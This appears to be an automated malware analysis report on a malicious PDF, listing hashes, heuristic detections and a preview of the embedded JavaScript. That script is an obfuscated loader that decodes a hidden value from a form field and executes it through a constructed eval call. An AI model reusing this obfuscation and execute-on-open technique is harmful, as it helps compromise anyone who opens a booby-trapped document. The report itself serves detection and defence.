Malicious PDF — malware analysis report

Static analysis result for SHA-256 dd4fb331655e1ab4…

MALICIOUS

PDF

44.4 KB Created: 2012-07-14 02:26:33 +04:00 Authoring application: Adobe Acrobat 7.0 (via Adobe Acrobat 7.0 Image Conversion Plug-in) First seen: 2026-05-09
MD5: b5845dda0b3360bbcac1de8afd55b5aa SHA-1: 72311de9673beb2320617beeb0cda13e9219b320 SHA-256: dd4fb331655e1ab4af8345523a53cc9d341a2c034c9c7cb23474f6f3401b5fd0
120 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT and PDF_JS. The ML classifier strongly flagged this PDF as malicious. While the document body is not text-based, the presence of JavaScript suggests an attempt to execute malicious code. The extracted artifact 'javascript_obj0106_000.js' is also suspicious. The exact intent of the script cannot be determined due to obfuscation, but it is likely designed to download and execute a second-stage payload.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9975

Heuristics 6

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function sadfjsadkl(str){return str.replace(/:/g,",");}
function qwaerasdf(asd){return String.fromCharCode(asd);}
function gqrqewfsdf(str){var set='';var s='';var ee='';
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF paints image(s) but contains no text operators info PDF_IMAGE_ONLY_LURE
    PDF has 1 image XObject(s) and the content stream contains no text-emitting operators (BT/ET, Tj, TJ, ', ") in either raw bytes or decompressed streams — this is the screenshot-as-PDF pattern used to bypass text-based scanners and to deliver instructions purely through rendered pixels. It is informational unless paired with invisible links or risky URI context.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0106_000.js pdf-javascript-stream PDF /JS object 106 at offset 0xADB6 1543 bytes
SHA-256: c62c21adc4674d00f1358964c67e92f74a243680c0076314725c20f843160b2e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function rhjahahagk(){
function dec(input2) {var asdf =gqrqewfsdf(input2) ; var asfdsad = hex2a(asdf); return asfdsad;}
function dsjfassldfhgj(sadsfjkgAD){var jdhjkashfhaui = 0/120+""; return jdhjkashfhaui+sadsfjkgAD;}
function sadfjsadkl(str){return str.replace(/:/g,",");}
function qwaerasdf(asd){return String.fromCharCode(asd);}
function gqrqewfsdf(str){var set='';var s='';var ee='';
str = sadfjsadkl(str);
str = str.split(",");
for(var i=0;i<str.length;i++){  
ee=str[i]/3;
set+=asdfqwef(ee.toString(16));}
return set;}
function asdfqwef(eds){var set='';var s=eds;
if (s.length<2)
{set=dsjfassldfhgj(s);}
else{set=s;}
return set;}
function hex2a(hex) {
    var str = '';var zzz=qwaerasdf;
    for (var i = 0; i < hex.length; i += 2){
	var sssss = hex.substr(i,2);
       str +=qwaerasdf('asdfwefwuiegfyuadsui0x'.substr(20,2)+sssss);
}return str;}
function adsfquifhiwuf(d,dd){return d+dd;}
var b2=getField("Text1");;
var ss=b2.value;
var ss=dec(ss);
var czvhjashavsiodhvuipashcpioasdcs  = app.alert["hadsfuihuiahfuhauishzcnxvvjbasbvdiopjiovpasodjviopasconstructorkajdsfhjkasdhfjkhadskjlhvlaksjhdvdsklavh".substring(52,63)];
function asdfeaf(s){if (s==0){return false}else{return true}}
var susea=asdfeaf(1)+"";
var seasus=asdfeaf(0)+"";
var daeaefe="eafadsfjekafhjkavadfefafaef";
var argqrgqadsfwqgwafdsfwef=susea[(3+3)/2];
argqrgqadsfwqgwafdsfwef+=daeaefe[(16+16)/2];
argqrgqadsfwqgwafdsfwef+=seasus[((1+9)/5)-1];
argqrgqadsfwqgwafdsfwef+=seasus[(2+10)/6];
czvhjashavsiodhvuipashcpioasdcs[argqrgqadsfwqgwafdsfwef](ss);
}
rhjahahagk();

Open this report in the interactive analyzer, or submit your own file for analysis.